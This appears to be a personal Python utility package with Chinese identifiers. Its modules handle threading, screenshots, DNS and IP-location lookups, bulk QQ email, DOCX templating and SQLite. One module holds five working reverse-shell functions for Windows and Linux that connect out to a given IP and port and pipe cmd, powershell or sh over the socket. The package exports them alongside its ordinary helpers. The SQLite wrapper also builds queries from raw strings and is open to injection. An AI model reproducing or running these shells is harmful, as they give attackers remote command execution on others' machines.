# 列表多线程处理

import sys
import threading
import queue



def 二次函数(函数, 线程id, 进程锁, 输入队列, 输出结果, 提示进度):
    def 进度条():
        total = len(输出结果)
        done = len(输出结果) - 输出结果.count(None)
        percent = done / total if total else 0

        bar_len = 40
        filled = int(bar_len * percent)
        bar = "█" * filled + "-" * (bar_len - filled)

        sys.stdout.write(f"\r[{bar}] {percent:.1%} ({done}/{total})")
        sys.stdout.flush()
    while True:
        # 从输入队列获取任务
        值 = 输入队列.get()

        # 如果任务为None，表示队列结束
        if 值 is None:
            break

        # 任务处理
        序号, 值 = 值
        try:
            # print(f"线程： {线程id} 【{序号} 】 输入：【{值}】")
            结果 = 函数(值)
        except Exception as e:
            print(f"线程： {线程id} 【{序号} 】 输入：【{值}】 error: 【{e}】")
            结果 = None

        # 使用锁确保输出的线程安全
        with 进程锁:
            # print(f"线程：{线程id} 完成")
            输出结果[序号] = 结果
            if 提示进度:
                进度条()


def 多线程(列表, 函数, 线程数, 提示进度=True):
    # 初始变量
    进程锁 = threading.Lock()
    输入队列 = queue.Queue()
    线程列表 = []
    输出结果 = [None]*len(列表)

    # 创建并启动多个线程
    if 提示进度:
        print(f"启动 {线程数} 个线程处理 {len(列表)} 个任务")
    for i in range(线程数):
        thread = threading.Thread(target=二次函数, args=(函数, i, 进程锁, 输入队列, 输出结果, 提示进度))
        thread.start()
        线程列表.append(thread)

    for f1, f2 in enumerate(列表):  # 添加任务到输入队列
        输入队列.put([f1, f2])

    # 添加任务结束标记到输入队列，每个线程一个
    for _ in range(len(线程列表)):
        输入队列.put(None)

    # 等待所有线程结束
    for thread in 线程列表:
        thread.join()
        # print('线程结束-1')

    if 提示进度:
        print('\n多线程处理完成')
    return 输出结果


# if __name__ == "__main__":
#     def test(e):
#         for i in range(3):
#             e += i
#             time.sleep(1)  # 模拟延迟0.1

#         return e

#     test1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
#     test2 = 多线程(列表=test1, 函数=test, 线程数=5, 提示进度=True)
#     print(test2)



def win1(ip, port=8888):
    import socket
    import subprocess
    import os
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))
        output = '[+] 连接成功!\n'
        response = output + f'\n{os.getcwd()} > '
        s.send(response.encode('utf-8'))
        while True:
            command = s.recv(1024).decode('utf-8').strip()
            if command.lower() == 'exit':
                break
            output = subprocess.getoutput(command)
            response = output + f'\n\n{os.getcwd()} > '
            s.send(response.encode('utf-8'))
    except Exception as e:
        s.send(f'[!] Connection error: {str(e)}\n'.encode())
    finally:
        s.close()


def win2(ip, port=8888, c='cmd'):
    import socket
    import subprocess
    import threading

    def s2p(s, p):
        try:
            while 1:
                d = s.recv(1024)
                if not d:
                    break
                p.stdin.write(d)
                p.stdin.flush()
        except:
            pass
        finally:
            p.stdin.close()

    def p2s(s, p):
        try:
            while 1:
                l = p.stdout.readline()
                if not l:
                    break
                try:
                    d = l.decode('gbk', errors='ignore')
                except:
                    d = l.decode('utf-8', errors='ignore')
                s.sendall(d.encode('utf-8'))
        except:
            pass
        finally:
            s.close()
    s = socket.socket()
    s.connect((ip, port))
    p = subprocess.Popen([c], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    threading.Thread(target=s2p, args=(s, p), daemon=True).start()
    threading.Thread(target=p2s, args=(s, p), daemon=True).start()
    try:
        p.wait()
    except:
        pass
    finally:
        s.close()


def win3(ip, port=8888, c='cmd'):
    import os
    import socket
    import subprocess
    import threading

    def s2p(s, p):
        while True:
            data = s.recv(1024)
            if len(data) > 0:
                p.stdin.write(data)
                p.stdin.flush()

    def p2s(s, p):
        while True:
            s.send(p.stdout.read(1))

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))

    p = subprocess.Popen([c], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

    s2p_thread = threading.Thread(target=s2p, args=[s, p])
    s2p_thread.daemon = True
    s2p_thread.start()

    p2s_thread = threading.Thread(target=p2s, args=[s, p])
    p2s_thread.daemon = True
    p2s_thread.start()

    try:
        p.wait()
    except KeyboardInterrupt:
        s.close()


def linux1(ip, port=8888, c='sh'):
    import socket
    import os
    import pty
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn(c)


def linux2(ip, port=8888, c='sh'):
    import socket
    import subprocess
    import os
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call([c, "-i"])




# win1('127.0.0.1', 8888)
# win2('127.0.0.1', 8888,'powershell')
# win3('127.0.0.1', 8888)
# lin1('192.168.111.11', c='bash')
# lin2('192.168.111.11', c='sh')



from xiaokang.常用 import xk, 报错信息,  时间_文件_天, 时间_文件_时, 时间_文件_分, 时间_文件_秒, 时间_正常, 时间_日志
from xiaokang.sqlite import sqlite数据库操作
from xiaokang.d多线程 import 多线程
from xiaokang.shell import win1, win2, win3, linux1, linux2
from xiaokang.x小工具1 import 截图, 解析ip, 查归属, 获取title, 发送邮件, 批量发送邮件
from xiaokang.p批量docx import 批量docx

# 定义外部可访问的内容（非必须，但推荐）
__all__ = [
    'xk', '报错信息', '时间_文件_天', '时间_文件_时', '时间_文件_分', '时间_文件_秒', '时间_正常', '时间_日志',
    'sqlite数据库操作',
    '多线程',
    'win1', 'win2', 'win3', 'linux1', 'linux2',
    '截图', '解析ip', '查归属', '获取title', '发送邮件', '批量发送邮件'
    '批量docx'
]





def 截图(save_path=None, start_x=0, start_y=0, width=None, height=None):
    import ctypes
    import pyautogui
    import os
    """
    屏幕截图函数

    参数:
        save_path (str|None): 保存路径，例如 C:\\test.png，为None则不保存
        width (int|None): 截图宽度，为None则全屏
        height (int|None): 截图高度，为None则全屏
        start_x (int): 起始X坐标
        start_y (int): 起始Y坐标

    返回:
        save_path (str) 或 PIL.Image.Image
    """

    # 修复Windows DPI缩放问题
    ctypes.windll.user32.SetProcessDPIAware()

    # 获取屏幕尺寸
    screen_width, screen_height = pyautogui.size()

    # 判断截图区域
    if width is None or height is None:
        region = (0, 0, screen_width, screen_height)
    else:
        region = (start_x, start_y, width, height)

    # 执行截图
    image = pyautogui.screenshot(region=region)

    # 保存文件（如果提供路径）
    if save_path:

        folder = os.path.dirname(save_path)

        if folder and not os.path.exists(folder):
            os.makedirs(folder)

        image.save(save_path)

    # 否则返回图像对象
    return image


def 解析ip(域名列表: list, DNS: list = None, 返回类型: str = 'list'):
    """
    解析域名IP地址
    解析ip(域名列表: list, DNS: list = None, 返回类型: str = 'list')
        域名列表：每个域名一个元素
        DNS：DNS服务器列表，默认使用常用DNS服务器
        返回类型：返回数据类型【list】
    """
    import dns.resolver
    from xiaokang.d多线程 import 多线程

    if DNS:
        DNS = DNS
    else:
        DNS = [
            "8.8.8.8",
            "8.8.4.4",
            "1.1.1.1",
            "1.0.0.1",
            "9.9.9.9",
            "149.112.112.112",
            "223.5.5.5",
            "223.6.6.6",
            "114.114.114.114",
            "114.114.115.115",
            "101.226.4.6",
            "218.30.118.6",
            "221.179.155.161",
            "211.138.180.2",
            "202.96.128.86",
            "202.96.128.166",
            "202.106.0.20",
            "202.106.196.115",
        ]
    DNS列表 = []

    def dns服务器连接(DNS):
        DNS服务器 = dns.resolver.Resolver(configure=False)
        DNS服务器.nameservers = [DNS]
        DNS服务器.lifetime = 2
        DNS服务器.timeout = 2
        return DNS服务器

    DNS列表 = 多线程(DNS, dns服务器连接, 20, False)

    # 全部数据【域名*DNS(18)*记录类型(2)】,每个域名至少跑36次DNS解析
    解析列表 = []
    for f1 in 域名列表:
        for f2 in DNS列表:
            for f3 in ["A", "AAAA"]:
                解析列表.append((f1.strip(), f2, f3))

    def 解析域名(值):
        # 值.append(str(e))
        # return 值
        try:
            域名, DNS服务器, 记录类型 = 值
            值 = list(值)
            answers = DNS服务器.resolve(域名, 记录类型)
            for rdata in answers:
                ip = rdata.to_text()
                return [域名, 记录类型, ip]
        except Exception as e:
            return [域名, 记录类型, '']

    结果 = 多线程(解析列表, 解析域名, 100)

    返回结果 = {}
    for f1 in 结果:
        if len(f1) < 3:
            continue

        if not 返回结果.get(f1[0]):
            返回结果[f1[0]] = [[], []]

        if f1[1] == "A":
            返回结果[f1[0]][0].append(f1[2])
        else:
            返回结果[f1[0]][1].append(f1[2])

    for f1, f2 in 返回结果.items():
        返回结果[f1][0] = list(set(返回结果[f1][0]))
        返回结果[f1][1] = list(set(返回结果[f1][1]))
        返回结果[f1][0].remove('')
        返回结果[f1][1].remove('')

    if 返回类型 == 'list':
        return 返回结果
    elif 返回类型 == 'dict':
        return list(返回结果.items())


def 查归属(IP列表: list):
    from bs4 import BeautifulSoup
    from xiaokang.d多线程 import 多线程
    import requests
    burp0_url = "https://ip.tool.chinaz.com:443/ipbatch"
    burp0_cookies = {
        "cz_statistics_visitor": "132d6f52-f8f1-4302-d10e-2e5678333942",
        "toolbox_urls": "www.kmmc.cn%2f%3fpc",
        "qHistory": "aHR0cDovL2lwLnRvb2wuY2hpbmF6LmNvbS9pcGJhdGNoL19JUOaJuemHj+afpeivog=="
    }
    burp0_headers = {
        "Sec-Ch-Ua": "\"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"",
        "Sec-Ch-Ua-Mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
        "Sec-Ch-Ua-Platform": "\"Windows\"",
        "Accept": "*/*",
        "Origin": "https://ip.tool.chinaz.com",
        "Sec-Fetch-Site": "same-site",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": "https://ip.tool.chinaz.com/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Priority": "u=1, i"
    }

    # 读取全部ip地址
    结果字典 = {}
    list1 = []  # 拆分成300个ip一份
    sz = 0
    while 1:
        if sz > len(IP列表):
            break
        list1.append(IP列表[sz:sz+300])
        sz += 300

    def 站长解析(域名列表):
        burp0_data = {"ips": '\r\n'.join(域名列表), "submore": "\xe6\x9f\xa5\xe8\xaf\xa2"}
        r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=60)
        soup = BeautifulSoup(r.text, "html.parser")
        tr1 = soup.find('tbody', id='ipList').find_all('tr')
        jglb = []
        for f2 in tr1:
            td1 = f2.find_all('td')
            jglb.append([td1[0].text.strip(), td1[3].text.strip()])
        return jglb

    解析结果 = 多线程(列表=list1, 函数=站长解析, 线程数=3)
    返回结果 = []
    for f1 in 解析结果:
        返回结果.extend(f1)

    return 返回结果


def 获取title(url, ssl=True, timeout=10, 进程锁=''):
    from bs4 import BeautifulSoup
    import requests
    import json

    ssl = 'https' if ssl else 'http'

    headers = {
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
    }
    try:
        r = requests.get(ssl+'://'+url + "/", headers=headers, verify=False, timeout=timeout)
        soup = BeautifulSoup(r.content, 'html.parser')
        if not soup.title:
            title = f'网页大小：{len(r.content)}'
        elif soup.title.string:
            title = soup.title.string.strip()
        else:
            title = f'网页大小：{len(r.content)}'
        with 进程锁:
            结果[url][ssl].append(title.replace('\r', '').replace('\n', '').replace('\t', '').strip()+'\t'+str(r.status_code))
    except requests.exceptions.ConnectionError:
        # 如果连接失败，则该 URL 不可用
        with 进程锁:
            结果[url][ssl].append('报xk错：无法连接'+'\t'+'-1')
    except requests.exceptions.RequestException as e:
        # 如果连接失败，则该 URL 不可用
        with 进程锁:
            结果[url][ssl].append(f"报xk错：请求异常: {str(e)}".replace('\r', '').replace('\n', '').replace('\t', '').strip()+'\t'+'-1')
    except requests.exceptions.SSLError:
        # 如果连接失败，则该 URL 不可用
        with 进程锁:
            结果[url][ssl].append('报xk错：SSL错误'+'\t'+'-1')
    except requests.exceptions.Timeout:
        # 如果连接超时，则该 URL 不可用
        with 进程锁:
            结果[url][ssl].append('报xk错：连接超时'+'\t'+'-1')
    except:
        # 未知报错
        with 进程锁:
            结果[url][ssl].append('报xk错：未知报错'+'\t'+'-1')
            except_type, except_value, except_traceback = sys.exc_info()
            exc_dict = {
                "报错类型": str(except_type),
                "报错信息": str(except_value),
                "报错文件": except_traceback.tb_frame.f_code.co_filename,
                "报错行数": except_traceback.tb_lineno,
            }
            print(json.dumps(exc_dict, ensure_ascii=False, indent=4, separators=(',', ':')))


def 发送邮件(发送者: str, 接收者: str, POP3: str, 邮件主题: str, 邮件内容: str):
    import smtplib
    from email.header import Header
    from email.mime.text import MIMEText
    import smtplib

    '''
    暂时只支持QQ邮箱，文本内容

    发送者: 发送者的邮箱地址
    接收者: 接收者的邮箱地址
    POP3: QQ邮箱的POP3授权码
    邮件主题: 邮件主题文本内容
    邮件内容: 邮件内容文本内容
    '''
    try:
        QQ服务器 = smtplib.SMTP_SSL('smtp.qq.com')
        QQ服务器.connect('smtp.qq.com', 465)
        QQ服务器.login(发送者, POP3)
        fsnr = MIMEText(邮件内容, 'plain', 'utf-8')
        fsnr['subject'] = 邮件主题
        fsnr['From'] = Header(发送者)  # 发送者
        fsnr['To'] = Header(接收者)  # 接收者
        QQ服务器.sendmail(发送者, 接收者, fsnr.as_string())
        QQ服务器.quit()
        return True
    except:
        return False


def 批量发送邮件(发送者: str, 接收者: list, POP3: str, 邮件主题: str, 邮件内容: str):
    import smtplib
    from email.header import Header
    from email.mime.text import MIMEText
    import smtplib

    '''
    发送者: 发送者的邮箱地址
    接收者: 接收者的邮箱地址的列表[xx@qq.com, xx@qq.com]
    POP3: QQ邮箱的POP3授权码
    邮件主题: 邮件主题文本内容
    邮件内容: 邮件内容文本内容
    '''
    try:
        QQ服务器 = smtplib.SMTP_SSL('smtp.qq.com')
        QQ服务器.connect('smtp.qq.com', 465)
        QQ服务器.login(发送者, POP3)
        fsnr = MIMEText(邮件内容, 'plain', 'utf-8')
        fsnr['subject'] = 邮件主题
        fsnr['From'] = Header(发送者)  # 发送者
        for f1 in 接收者:
            fsnr['To'] = Header(f1)  # 接收者
            QQ服务器.sendmail(发送者, f1, fsnr.as_string())
        QQ服务器.quit()
        return True
    except:
        return False


if __name__ == '__main__':
    pass
    # 截图(save_path='C:\\test.png')
    # print(解析ip(open('ip.txt', 'r', encoding='utf-8').readlines()))
    # 域名列表 = open('ip.txt', 'r', encoding='utf-8').readlines()
    # a=查归属(域名列表)




import pandas as pd
import os
import sys

from docx import Document
from copy import deepcopy
from docx.enum.text import WD_COLOR_INDEX
from docx.shared import RGBColor, Pt
from xiaokang.常用 import 时间_文件_分


def 提取块核心样式(run):
    """
    提取run的核心样式特征（新增背景色），用于判断是否相同
    :param run: run对象
    :return: 包含样式特征的字典
    """
    # 提取背景色（高亮色）：优先取RGB值，无则取枚举值，都无则为None
    bg_color = None
    if run.font.highlight_color:
        # 处理枚举类型的背景色（如红色、黄色等）
        if isinstance(run.font.highlight_color, WD_COLOR_INDEX):
            bg_color = run.font.highlight_color.name  # 转为字符串（如"YELLOW"）
        # 部分场景下背景色是RGB值（较少见，兼容处理）
        elif hasattr(run.font.highlight_color, 'rgb'):
            bg_color = run.font.highlight_color.rgb

    return {
        "bold": run.bold,
        "italic": run.italic,
        "font_size": run.font.size,
        "font_color": run.font.color.rgb if run.font.color else None,
        "underline": run.underline,
        "font_name": run.font.name,
        "bg_color": bg_color  # 新增：文本背景色（高亮色）
    }


def 合并样式相同块(paragraph):
    """
    合并段落中样式相同的相邻run，保留不同样式的run
    :param paragraph: 要处理的段落对象
    """
    if len(paragraph.runs) <= 1:
        return paragraph  # 只有1个run，无需合并

    # 步骤1：按样式分组，合并同组文本
    style_groups = []
    # 初始化第一个分组
    first_run = paragraph.runs[0]
    current_style = 提取块核心样式(first_run)
    current_text = first_run.text

    # 遍历剩余run，分组合并
    for run in paragraph.runs[1:]:
        run_style = 提取块核心样式(run)
        # 判断当前run样式是否与上一个分组一致（字典相等则样式相同）
        if run_style == current_style:
            current_text += run.text  # 合并文本
        else:
            # 样式不同，保存当前分组，新建分组
            style_groups.append({"style": current_style, "text": current_text})
            current_style = run_style
            current_text = run.text
    # 保存最后一个分组
    style_groups.append({"style": current_style, "text": current_text})

    # 步骤2：清空原段落的所有run（从后往前删，避免索引错乱）
    for run in reversed(paragraph.runs):
        paragraph._element.remove(run._element)

    # 步骤3：重新添加合并后的run，恢复原样式
    for group in style_groups:
        new_run = paragraph.add_run(group["text"])
        # 应用原样式
        style = group["style"]
        new_run.bold = style["bold"]
        new_run.italic = style["italic"]
        new_run.underline = style["underline"]
        new_run.font.size = style["font_size"]
        new_run.font.name = style["font_name"]
        if style["font_color"]:
            new_run.font.color.rgb = style["font_color"]

    return paragraph


def 读docx(文件路径):
    """
    读取docx文件，返回文档对象
    """
    try:
        doc = Document(文件路径)

        for f1 in doc.paragraphs:
            合并样式相同块(f1)

        for f1 in doc.tables:  # 全表格
            for f2 in f1._cells:  # 每个单元格
                for f3 in f2.paragraphs:  # 每个单元格中的段落
                    合并样式相同块(f3)

        return doc
    except Exception as e:
        print("读取docx文件出错：", e)
        return None


def 读xlsx(文件路径):
    try:
        df = pd.read_excel(文件路径)
        data_dict = df.to_dict(orient="records")
        return data_dict
    except Exception as e:
        print("读取xlsx文件出错：", e)
        return None


def 批量docx(docx模板路径, xlsx表格路径, 输出目录):
    # 示例：测试合并效果

    if not os.path.exists(docx模板路径):
        print("docx模板不存在")
        sys.exit()
    if not os.path.exists(xlsx表格路径):
        print("xlsx数据不存在")
        sys.exit()
    if not os.path.exists(输出目录):
        os.makedirs(输出目录)

    docx = 读docx(docx模板路径)
    xlsx = 读xlsx(xlsx表格路径)

    temp_copy_path = f'{时间_文件_分()}.docx'
    docx文件名名称 = os.path.split(docx模板路径)[1]

    try:
        doc = docx.save(temp_copy_path)
        for f6, f1 in enumerate(xlsx, 1):
            doc = Document(temp_copy_path)

            # 段落
            for f2 in doc.paragraphs:
                for f3 in f2.runs:
                    try:
                        f3.text = f3.text.format(**f1)
                    except KeyError as e:
                        print(f'表格缺少对象【{e}】')
                    except Exception as e:
                        print(f'未知报错：{e}')

            for f2 in doc.tables:
                for f3 in f2._cells:
                    for f4 in f3.paragraphs:
                        for f5 in f4.runs:
                            try:
                                f5.text = f5.text.format(**f1)
                            except KeyError as e:
                                print(f'表格缺少对象【{e}】')
                            except Exception as e:
                                print(f'未知报错：{e}')

            doc.save(f'{os.path.abspath(os.path.join(输出目录, docx文件名名称.format(**f1)))}')
            print(f"完成【{f6}/{len(xlsx)}】：{docx文件名名称.format(**f1)}")
    except Exception as e:
        print(f"出错：{e}")
        sys.exit()
    os.remove(temp_copy_path)


if __name__ == '__main__':
    pass
    # docx模板路径 = "g:\\全代码\\历史项目\\批量word报告\\1{ceshi}.docx"
    # xlsx表格路径 = "g:\\全代码\\历史项目\\批量word报告\\1.xlsx"
    # 输出目录='G:\\全代码\\历史项目\\批量word报告\\cs\\2026年3月13日'

    # 批量docx(docx模板路径, xlsx表格路径, 输出目录)





import datetime
import inspect
import os
import sqlite3
from xiaokang import 常用


class sqlite数据库操作:
    # 2025年08月29日14时01分43秒
    def __init__(self, 数据库文件, 操作日志="", 报错日志=""):
        self.数据库文件 = 数据库文件
        self.操作日志 = 操作日志
        self.报错日志 = 报错日志
        # 如果要保留日志->创建目录，确保目录存在，exist_ok=True 表示如果目录已经存在，不会报错。
        if 操作日志:
            os.makedirs(os.path.split(操作日志)[0], exist_ok=True)
        if 报错日志:
            os.makedirs(os.path.split(报错日志)[0], exist_ok=True)

    # 2025年08月29日14时04分31秒
    def 写日志(self, 内容):
        if not self.操作日志:
            return
        时间戳 = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        调用者 = inspect.stack()[1].function
        日志内容 = f"{时间戳}\t{调用者}\t{内容}\n"
        with open(self.操作日志, "a", encoding="utf-8") as f:
            f.write(日志内容)

    # 2025年08月29日14时04分54秒
    def 连接(self):
        # 判断是否连接
        if hasattr(self, "conn"):
            self.写日志("数据库已连接，跳过连接")
            self.连接情况 = True
            return True, "数据库已连接"
        self.写日志("准备连接……")
        try:
            self.conn = sqlite3.connect(self.数据库文件, check_same_thread=False)
            self.cursor = self.conn.cursor()
            self.写日志("数据库连接成功")
            self.连接情况 = True
            return True, "数据库连接成功"
        except Exception:
            self.写日志("数据库连接报错")
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            self.连接情况 = False
            return False, 错误

    # 2025年08月29日14时09分03秒
    def 提交(self):
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法提交")
            return False, "未发现连接对象，无法提交"
        self.写日志("准备提交……")
        try:
            self.conn.commit()
            self.写日志("事务提交成功")
            return True, "事务提交成功"
        except Exception:
            self.写日志("事务提交报错")
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误

    # 2025年08月29日14时11分37秒
    def 断开(self):
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，已跳过断开")
            return False, "未发现连接对象，已跳过断开"
        self.写日志("准备断开……")
        try:
            self.conn.commit()
            self.写日志("事务提交成功")
            self.conn.close()
            self.写日志("数据库连接断开")
            self.连接情况 = False
            del self.conn
            del self.cursor
            return True, "数据库连接断开"
        except Exception:
            self.写日志("数据库连接断开报错")
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误

    # 2025年08月29日14时13分37秒
    def 执行SQL(self, sql):
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法执行SQL")
            return False, "未发现连接对象，无法执行SQL"
        self.写日志("准备执行SQL……")
        try:
            self.写日志(f"执行SQL：{sql}")
            self.cursor.execute(sql)
            结果 = self.cursor.fetchall()
        except Exception:
            self.写日志("执行SQL报错")
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误
        return True, 结果

    # 2026年2月28日
    def 创建表(self, 表名: str, 字段: list, 字段类型: dict = {}, 字段默认值="TEXT"):
        """
        创建表(表名='Information', 字段=['A', 'b', 'c', 'D'], 字段类型={'A': 'integer',  'c': 'real', 'D': 'bolo'}, 默认值="TEXT")
            表名：创建的数据库表名
            字段：需要创建的字段列表，['A', 'b', 'c', 'D']
            字段类型：字段类型字典，{'A': 'integer',  'c': 'real', 'D': 'bolo'}，默认值TEXT
            字段默认值：字段默认值，默认TEXT
        """
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法创建表")
            return False, "未发现连接对象，无法创建表"
        self.写日志("准备创建表……")
        try:
            sql = f'CREATE TABLE "{表名}" ('
            for 字 in 字段:
                sql += f'"{字}" {字段类型.get(字, 字段默认值)},'
            sql = sql.rstrip(",") + ");"
            self.写日志(f"创建表：{sql}")
            self.cursor.execute(sql)
            self.提交()
        except Exception:
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误
        return True, "创建成功"

    # 2026年2月28日
    def 读取数据(self, 表名: str, 查看字段: list = ["*"], 判断匹配: list = [], 显示行数: list = []):
        """
        读取数据(表名='Information', 查看字段=['A', 'b', 'c', 'D'], 判断匹配=['A=1', 'and', 'b="2b"'], 显示行数=[0, 1])
            表名：查询的数据库表名
            查看字段：需要查看的字段，默认['*']，表示全部字段，['A', 'b', 'c', 'D']，表示只查看A、b、c、D字段
            判断匹配：需要匹配的条件，默认[]，表示不匹配，['A=1', 'and', 'b="2b"']，表示匹配A=1且b="2b"，分隔是空格
            显示行数：需要显示的行数，默认[]，表示全部行，[0,10]，表示显示从第0行后显示10行
        """
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法读取数据")
            return False, "未发现连接对象，无法读取数据"
        self.写日志("准备读取数据……")
        try:
            sql = (
                f'SELECT {"*" if 查看字段 == ["*"] else ",".join(查看字段)} '
                f'FROM "{表名.replace(".", "\".\"")}" '
            )
            if 判断匹配:
                sql += f'WHERE {" ".join(判断匹配)} '
            if 显示行数:
                sql += f'LIMIT {显示行数[0]},{显示行数[1]}'
            sql += ";"
            self.写日志(f"读取数据：{sql}")
            self.cursor.execute(sql)
            return True, self.cursor.fetchall()
        except Exception:
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误

    # 2026年2月28日
    def 新增数据(self, 表名: str, 数据: dict):
        """
        新增数据(表名='Information', 数据={'A': 1, 'b': '3b', 'c': 3.1415926, 'D': True})
            表名：新增数据的数据库表名
            数据：新增的数据字典
        """
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法新增数据")
            return False, "未发现连接对象，无法新增数据"
        self.写日志("准备新增数据……")
        try:
            段 = []
            值 = []
            for f1, f2 in 数据.items():
                段.append(f1)
                值.append(f2)
            字段串 = '"' + '","'.join(段) + '"'
            占位符 = ",".join(["?"] * len(段))
            sql = f'INSERT INTO "{表名.replace('.', '"."')}" ({字段串}) VALUES ({占位符})'
            self.写日志(f"新增数据：{sql}\nvalue：{值}")
            self.cursor.execute(sql, 值)
            序号 = self.cursor.lastrowid
            return True, 序号
        except Exception:
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误

    # 2026年2月28日
    def 修改数据(self, 表名: str, 查数据: list, 写数据: dict):
        """
        修改数据(表名='Information', 查数据=[('A','=',1),'and',('b','=','2b')], 写数据={'c': 21.45116})
            表名：修改数据的数据库表名
            查数据：需要匹配的条件字典，{'A': 1, 'b': '2b'}，表示匹配A=1且b="2b"
            写数据：需要修改的字段字典，{'启动项': 2, '系统进程': 2, 'usb插拔记录': 2}
        """
        # 判断是否连接
        if not hasattr(self, "conn"):
            self.写日志("未发现连接对象，无法修改数据")
            return False, "未发现连接对象，无法修改数据"
        self.写日志("准备修改数据……")
        try:
            参数 = []

            写_语句 = []
            for f1, f2 in 写数据.items():
                写_语句.append(f'{f1} = ?')
                参数.append(f2)

            查_语句 = []
            for f1 in 查数据:
                if type(f1) == tuple:
                    查_语句.append(f'{f1[0]} {f1[1]} ?')
                    参数.append(f1[2])
                else:
                    查_语句.append(f1)

            sql = f'UPDATE "{表名.replace(".", "\".\"")}" SET {' , '.join(写_语句)} WHERE {' '.join(查_语句)}'
            self.写日志(f"修改数据：{sql}\nvalue：{参数}")
            self.cursor.execute(sql, 参数)
        except Exception:
            错误 = 常用.报错信息(保存到文件=self.报错日志)
            return False, 错误
        return True, "修改成功"

    # def update(self, 表名: str, 数据: dict, where=None):

    #     设置列表 = []
    #     参数列表 = []

    #     for 字段, 值 in 数据.items():

    #         设置列表.append(f'"{字段}" = ?')
    #         参数列表.append(值)

    #     设置语句 = ", ".join(设置列表)

    #     sql = (
    #         f"UPDATE {self._处理表名(表名)} "
    #         f"SET {设置语句}"
    #     )

    #     where_sql, where参数 = self._构建WHERE(where)

    #     sql += where_sql

    #     参数列表.extend(where参数)

    #     print("SQL:", sql)
    #     print("参数:", 参数列表)

    #     self.cursor.execute(sql, 参数列表)

    #     self.conn.commit()

    #     return self.cursor.rowcount


# if __name__ == "__main__":
#     a = sqlite数据库操作('xk.db')
#     b=a.连接()
#     print(b)
#     print(a.连接情况)
#     b=a.创建表(表名='Information', 字段=['A', 'b', 'c', 'D'], 字段类型={'A': 'integer',  'c': 'real', 'D': 'bolo'}, 字段默认值="TEXT")
#     print(b)
#     b=a.新增数据(表名='Information', 数据={'A': 1, 'b': 'b', 'c': 3.1415926, 'D': True})
#     b=a.提交()
#     print(b)
#     print(b)
#     b=a.新增数据(表名='Information', 数据={'A': 1, 'b': '2b', 'c': 3.1415926, 'D': True})
#     b=a.提交()
#     print(b)
#     print(b)
#     b=a.提交()
#     print(b)
#     b=a.读取数据(表名='Information', 查看字段=['A', 'b', 'c', 'D'], 判断匹配=['A=1', 'and', 'b="b"'], 显示行数=[0, 1])
#     print(b)
#     b=a.修改数据(表名='Information', 查数据=[('A', '=', 1), 'and', ('b', '=', 'b')], 写数据={'c': 21.45116, 'd': False})
#     print(b)
#     b=a.提交()
#     print(b)
#     b=a.执行SQL('SELECT *,rowid "NAVICAT_ROWID" FROM "main"."Information" LIMIT 0,1000')
#     print(b)
#     b=a.断开()
#     print(b)
#     print(1)
